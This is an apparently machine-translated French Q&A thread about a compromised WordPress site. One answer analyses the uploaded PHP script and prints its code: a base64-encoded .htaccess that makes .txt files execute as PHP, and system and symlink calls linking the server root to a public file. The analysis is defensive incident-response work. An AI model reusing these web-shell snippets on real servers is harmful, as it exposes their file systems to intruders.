web-dev-qa-db-fra.com

Comment le pirate informatique a-t-il eu accès à mon WordPress Télécharger un dossier?

Hier, j'ai découvert qu'il y a ceci http://pastebin.com/mrryn4ht PHP fichier dans mon serveur d'amis. Je veux savoir comment le piratage a-t-il pu télécharger là-bas? J'ai lu les questions similaires mais je n'ai pas pu trouver une réponse correcte.

ÉDITER:-

Aujourd'hui, j'ai appris à savoir que le WordPress site a été enfreint par brute-forçage du mot de passe (le mot de passe est fort). Je ne sais toujours pas comment ils ont réussi à craquer ce mot de passe.

Après avoir craqué le mot de passe, ils se sont connectés et ont téléchargé les fichiers PHP.Après googling sur DONNAZMI.TXT J'ai découvert que tant d'autres sites sont également piratés sur ou autour du même jour (13 juillet). Les hacks utilisant le même script continuent encore. Le mot de passe pour le WordPress Server a été modifié en plus complexe et ces fichiers PHP ont été supprimés.

Merci pour les réponses et les commentaires. Désolé, j'aurais dû donner plus d'informations tout en affectant la question.

2
Sai Krishna

Une fois que le fichier est téléchargé sur le serveur ( exploitant un bogue dans un wordpress theme ), le .htaccess est reconfiguré d'une manière que tout .txt Le fichier sera interprété par le serveur en tant que .php script et cela suivra des liens symboliques.

L'étape suivante est l'astuce, il fait un link de / à Donnazmi.txt (2 façons)

Le code n'est pas vraiment complexe, il imprime un formulaire HTML avec les configurations nécessaires pour exécuter les étapes de l'exploitation (vous devez envoyer une demande postale avec Donnazmi comme clé de poste pour le voir).

Code expliqué:

.htaccess reconfig:

$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';

Ceci est une chaîne codée de base64, qui se traduit par:

Options Indexes FollowSymLinks   
DirectoryIndex ssssss.htm        
AddType txt .php                 
AddHandler txt .php              

Donc, avec cette configuration:

$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem)); 
// write the new config inside the file

Symlinks:

// 1. this is a link with the linux comand `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");

Après l'exécution, chaque fois qu'il visite example.com/donnazmi.txt, il voit une liste du répertoire racine de votre serveur (Options Indexes tm).

Alors oui reconstruisez cette machine. et vérifiez le logiciel avant de l'installer.

6
jmingov

La vidéo que j'ai trouvée était la première chose à venir lorsque je google le nom de la pirate informatique.

Avez-vous Wordpress thème de fusion à froid installé par une chance?

Voici le soi-disant Vidéo de l'attaquant de la Mauritanie sur expliquer comment il exploite le fichier spécifique WordPress thème pour télécharger des fichiers sur le serveur.

1
LazyHands